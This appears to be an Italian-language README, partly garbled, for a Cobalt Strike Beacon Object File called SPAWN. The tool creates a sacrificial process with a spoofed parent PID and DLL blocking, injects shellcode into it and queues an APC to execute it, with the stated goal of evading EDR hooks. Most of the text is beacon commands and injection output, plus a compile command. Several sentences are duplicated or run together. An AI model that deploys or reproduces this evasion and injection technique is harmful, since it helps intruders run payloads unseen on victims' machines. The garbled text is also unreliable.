
Cobalt Strike BOF che genera un processo sacrificale, lo inietta con shellcode ed esegue il payload. Progettato per eludere gli hook EDR/UserLand generando un processo sacrificale con Arbitrary Code Guard (ACG), BlockDll e PPID spoofing.
BOF per Cobalt Strike che genera un processo sacrificale, vi inietta shellcode ed esegue il payload. Realizzato per eludere gli hook EDR/UserLand generando un processo sacrificale con Arbitrary Code Guard (ACG), BlockDll e PPID spoofing.

beacon> spawn notepad.exe 6248 /Users/bobby.cooke/git/boku7/SPAWN/popCalc.bin
[*] SPAWN (Bobby Cooke//SpiderLabs|@0xBoku|github.com/boku7)
[+] Opened handle 0x534 to process 6248(PID)
[+] Spawned process: notepad.exe | PID: 8404 | PPID: 6248
[+] Allocated RE memory in remote process 8404 (PID) at: 0x00000177A72C0000
[+] Wrote 280 bytes to memory in remote process 8404 (PID) at 0x00000177A72C0000
[+] APC queued for main thread of 8404 (PID) to shellcode address 0x00000177A72C0000
beacon> help
spawn Spawn a process with a spoofed PPID and blockDll
beacon> help spawn
Synopsis: spawn /path/to/exe PPID
beacon> ps
8264 5536 OneDrive.exe x86 1 DESKTOP-KOSR2NO\boku
beacon> spawn cmd.exe 8264
[*] SPAWN (@0xBoku|github.com/boku7)
Opened handle 0x634 to process 8264(PID)
Success! Spawned process: cmd.exe | PID: 5384 | PPID: 8264
blockdll "simile" a Cobalt Strikex86_64-w64-mingw32-gcc -c spawn.x64.c -o spawn.x64.o
beacon> spawn /path/to/exe PPID /local/path/to/shellcode.bin

cmd.exe generato con PPID come OneDrive.exeblockdll di Cobalt Strike per impedire il caricamento di DLL non firmate da Microsoft nella memoria dei processi generati
Signatures restricted (Microsoft only)Signatures restricted (Microsoft only) fa sì che le DLL non firmate da Microsoft non possano essere caricate nel nostro processo generato
